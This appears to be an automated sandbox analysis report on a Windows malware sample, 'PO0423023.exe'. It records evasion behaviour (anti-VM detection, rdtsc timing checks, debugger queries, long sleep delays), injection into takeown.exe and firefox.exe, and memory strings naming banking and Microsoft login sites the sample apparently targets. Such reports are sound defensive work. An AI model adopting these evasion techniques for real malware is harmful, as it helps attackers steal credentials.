Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PO0423023.exe PID: 3648, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: 2470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: 4470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: 7130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: 6E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: 8130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: 9130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: 9890000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Memory allocated: 7130000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe

Code function: 3_2_01A0096E rdtsc

3_2_01A0096E

Source: C:\Users\user\Desktop\PO0423023.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe	Window / User API: threadDelayed 2613			Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Window / User API: threadDelayed 7359			Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\takeown.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\PO0423023.exe TID: 6388	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 3116	Thread sleep count: 2613 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 3116	Thread sleep time: -5226000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 3116	Thread sleep count: 7359 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 3116	Thread sleep time: -14718000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe TID: 6096	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\takeown.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\takeown.exe

Code function: 6_2_032FBAC0 FindFirstFileW,FindNextFileW,FindClose,

6_2_032FBAC0

Source: C:\Users\user\Desktop\PO0423023.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 43PI9J.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: takeown.exe, 00000006.00000002.3266159906.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EVMware20,11696428655^
Source: 43PI9J.6.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 43PI9J.6.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 43PI9J.6.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 43PI9J.6.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 43PI9J.6.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 43PI9J.6.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 43PI9J.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 43PI9J.6.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 43PI9J.6.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 43PI9J.6.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 43PI9J.6.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 43PI9J.6.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 43PI9J.6.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: takeown.exe, 00000006.00000002.3266159906.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kers.comVMware20,11696428655}
Source: 43PI9J.6.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: takeown.exe, 00000006.00000002.3261394399.00000000035AE000.00000004.00000020.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000008.00000002.3262134884.000000000159F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2805518146.000001BAEE95C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: takeown.exe, 00000006.00000002.3266159906.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696428655^
Source: 43PI9J.6.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 43PI9J.6.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 43PI9J.6.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 43PI9J.6.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 43PI9J.6.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: takeown.exe, 00000006.00000002.3266159906.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ive Brokers - NDCDYNVMware20,11696428655z
Source: 43PI9J.6.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 43PI9J.6.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: takeown.exe, 00000006.00000002.3266159906.00000000083C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .bankofamerica.comVMware20,11696428655\|UE
Source: 43PI9J.6.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 43PI9J.6.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 43PI9J.6.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 43PI9J.6.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 43PI9J.6.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 43PI9J.6.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 43PI9J.6.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 43PI9J.6.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 43PI9J.6.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\PO0423023.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe

Code function: 3_2_01A0096E rdtsc

3_2_01A0096E

Source: C:\Users\user\Desktop\PO0423023.exe

Code function: 3_2_004176B3 LdrLoadDll,

3_2_004176B3

Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BA197 mov eax, dword ptr fs:[00000030h]	3_2_019BA197
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BA197 mov eax, dword ptr fs:[00000030h]	3_2_019BA197
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BA197 mov eax, dword ptr fs:[00000030h]	3_2_019BA197
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A00185 mov eax, dword ptr fs:[00000030h]	3_2_01A00185
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A64180 mov eax, dword ptr fs:[00000030h]	3_2_01A64180
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A64180 mov eax, dword ptr fs:[00000030h]	3_2_01A64180
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7C188 mov eax, dword ptr fs:[00000030h]	3_2_01A7C188
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7C188 mov eax, dword ptr fs:[00000030h]	3_2_01A7C188
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4019F mov eax, dword ptr fs:[00000030h]	3_2_01A4019F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4019F mov eax, dword ptr fs:[00000030h]	3_2_01A4019F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4019F mov eax, dword ptr fs:[00000030h]	3_2_01A4019F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A4019F mov eax, dword ptr fs:[00000030h]	3_2_01A4019F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A961E5 mov eax, dword ptr fs:[00000030h]	3_2_01A961E5
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F01F8 mov eax, dword ptr fs:[00000030h]	3_2_019F01F8
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A861C3 mov eax, dword ptr fs:[00000030h]	3_2_01A861C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A861C3 mov eax, dword ptr fs:[00000030h]	3_2_01A861C3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]	3_2_01A3E1D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]	3_2_01A3E1D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E1D0 mov ecx, dword ptr fs:[00000030h]	3_2_01A3E1D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]	3_2_01A3E1D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]	3_2_01A3E1D0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov eax, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov ecx, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov eax, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov eax, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov ecx, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov eax, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov eax, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov ecx, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov eax, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E10E mov ecx, dword ptr fs:[00000030h]	3_2_01A6E10E
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F0124 mov eax, dword ptr fs:[00000030h]	3_2_019F0124
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A80115 mov eax, dword ptr fs:[00000030h]	3_2_01A80115
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6A118 mov ecx, dword ptr fs:[00000030h]	3_2_01A6A118
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6A118 mov eax, dword ptr fs:[00000030h]	3_2_01A6A118
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6A118 mov eax, dword ptr fs:[00000030h]	3_2_01A6A118
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6A118 mov eax, dword ptr fs:[00000030h]	3_2_01A6A118
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C6154 mov eax, dword ptr fs:[00000030h]	3_2_019C6154
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C6154 mov eax, dword ptr fs:[00000030h]	3_2_019C6154
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BC156 mov eax, dword ptr fs:[00000030h]	3_2_019BC156
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94164 mov eax, dword ptr fs:[00000030h]	3_2_01A94164
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A94164 mov eax, dword ptr fs:[00000030h]	3_2_01A94164
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A54144 mov eax, dword ptr fs:[00000030h]	3_2_01A54144
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A54144 mov eax, dword ptr fs:[00000030h]	3_2_01A54144
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A54144 mov ecx, dword ptr fs:[00000030h]	3_2_01A54144
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A54144 mov eax, dword ptr fs:[00000030h]	3_2_01A54144
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A54144 mov eax, dword ptr fs:[00000030h]	3_2_01A54144
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A58158 mov eax, dword ptr fs:[00000030h]	3_2_01A58158
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A580A8 mov eax, dword ptr fs:[00000030h]	3_2_01A580A8
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A860B8 mov eax, dword ptr fs:[00000030h]	3_2_01A860B8
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A860B8 mov ecx, dword ptr fs:[00000030h]	3_2_01A860B8
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C208A mov eax, dword ptr fs:[00000030h]	3_2_019C208A
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B80A0 mov eax, dword ptr fs:[00000030h]	3_2_019B80A0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A460E0 mov eax, dword ptr fs:[00000030h]	3_2_01A460E0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A020F0 mov ecx, dword ptr fs:[00000030h]	3_2_01A020F0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BC0F0 mov eax, dword ptr fs:[00000030h]	3_2_019BC0F0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C80E9 mov eax, dword ptr fs:[00000030h]	3_2_019C80E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BA0E3 mov ecx, dword ptr fs:[00000030h]	3_2_019BA0E3
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A420DE mov eax, dword ptr fs:[00000030h]	3_2_01A420DE
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE016 mov eax, dword ptr fs:[00000030h]	3_2_019DE016
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE016 mov eax, dword ptr fs:[00000030h]	3_2_019DE016
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE016 mov eax, dword ptr fs:[00000030h]	3_2_019DE016
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE016 mov eax, dword ptr fs:[00000030h]	3_2_019DE016
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A56030 mov eax, dword ptr fs:[00000030h]	3_2_01A56030
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A44000 mov ecx, dword ptr fs:[00000030h]	3_2_01A44000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000 mov eax, dword ptr fs:[00000030h]	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000 mov eax, dword ptr fs:[00000030h]	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000 mov eax, dword ptr fs:[00000030h]	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000 mov eax, dword ptr fs:[00000030h]	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000 mov eax, dword ptr fs:[00000030h]	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000 mov eax, dword ptr fs:[00000030h]	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000 mov eax, dword ptr fs:[00000030h]	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A62000 mov eax, dword ptr fs:[00000030h]	3_2_01A62000
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BA020 mov eax, dword ptr fs:[00000030h]	3_2_019BA020
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BC020 mov eax, dword ptr fs:[00000030h]	3_2_019BC020
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C2050 mov eax, dword ptr fs:[00000030h]	3_2_019C2050
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019EC073 mov eax, dword ptr fs:[00000030h]	3_2_019EC073
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A46050 mov eax, dword ptr fs:[00000030h]	3_2_01A46050
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B8397 mov eax, dword ptr fs:[00000030h]	3_2_019B8397
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B8397 mov eax, dword ptr fs:[00000030h]	3_2_019B8397
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019B8397 mov eax, dword ptr fs:[00000030h]	3_2_019B8397
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E438F mov eax, dword ptr fs:[00000030h]	3_2_019E438F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E438F mov eax, dword ptr fs:[00000030h]	3_2_019E438F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BE388 mov eax, dword ptr fs:[00000030h]	3_2_019BE388
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BE388 mov eax, dword ptr fs:[00000030h]	3_2_019BE388
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BE388 mov eax, dword ptr fs:[00000030h]	3_2_019BE388
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	3_2_019CA3C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	3_2_019CA3C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	3_2_019CA3C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	3_2_019CA3C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	3_2_019CA3C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019CA3C0 mov eax, dword ptr fs:[00000030h]	3_2_019CA3C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C83C0 mov eax, dword ptr fs:[00000030h]	3_2_019C83C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C83C0 mov eax, dword ptr fs:[00000030h]	3_2_019C83C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C83C0 mov eax, dword ptr fs:[00000030h]	3_2_019C83C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019C83C0 mov eax, dword ptr fs:[00000030h]	3_2_019C83C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019F63FF mov eax, dword ptr fs:[00000030h]	3_2_019F63FF
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A463C0 mov eax, dword ptr fs:[00000030h]	3_2_01A463C0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A7C3CD mov eax, dword ptr fs:[00000030h]	3_2_01A7C3CD
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE3F0 mov eax, dword ptr fs:[00000030h]	3_2_019DE3F0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE3F0 mov eax, dword ptr fs:[00000030h]	3_2_019DE3F0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019DE3F0 mov eax, dword ptr fs:[00000030h]	3_2_019DE3F0
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A643D4 mov eax, dword ptr fs:[00000030h]	3_2_01A643D4
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A643D4 mov eax, dword ptr fs:[00000030h]	3_2_01A643D4
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D03E9 mov eax, dword ptr fs:[00000030h]	3_2_019D03E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D03E9 mov eax, dword ptr fs:[00000030h]	3_2_019D03E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D03E9 mov eax, dword ptr fs:[00000030h]	3_2_019D03E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D03E9 mov eax, dword ptr fs:[00000030h]	3_2_019D03E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D03E9 mov eax, dword ptr fs:[00000030h]	3_2_019D03E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D03E9 mov eax, dword ptr fs:[00000030h]	3_2_019D03E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D03E9 mov eax, dword ptr fs:[00000030h]	3_2_019D03E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019D03E9 mov eax, dword ptr fs:[00000030h]	3_2_019D03E9
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E3DB mov eax, dword ptr fs:[00000030h]	3_2_01A6E3DB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E3DB mov eax, dword ptr fs:[00000030h]	3_2_01A6E3DB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E3DB mov ecx, dword ptr fs:[00000030h]	3_2_01A6E3DB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6E3DB mov eax, dword ptr fs:[00000030h]	3_2_01A6E3DB
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019BC310 mov ecx, dword ptr fs:[00000030h]	3_2_019BC310
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A98324 mov eax, dword ptr fs:[00000030h]	3_2_01A98324
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A98324 mov ecx, dword ptr fs:[00000030h]	3_2_01A98324
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A98324 mov eax, dword ptr fs:[00000030h]	3_2_01A98324
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A98324 mov eax, dword ptr fs:[00000030h]	3_2_01A98324
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019E0310 mov ecx, dword ptr fs:[00000030h]	3_2_019E0310
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA30B mov eax, dword ptr fs:[00000030h]	3_2_019FA30B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA30B mov eax, dword ptr fs:[00000030h]	3_2_019FA30B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_019FA30B mov eax, dword ptr fs:[00000030h]	3_2_019FA30B
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A6437C mov eax, dword ptr fs:[00000030h]	3_2_01A6437C
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A9634F mov eax, dword ptr fs:[00000030h]	3_2_01A9634F
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: 3_2_01A42349 mov eax, dword ptr fs:[00000030h]	3_2_01A42349
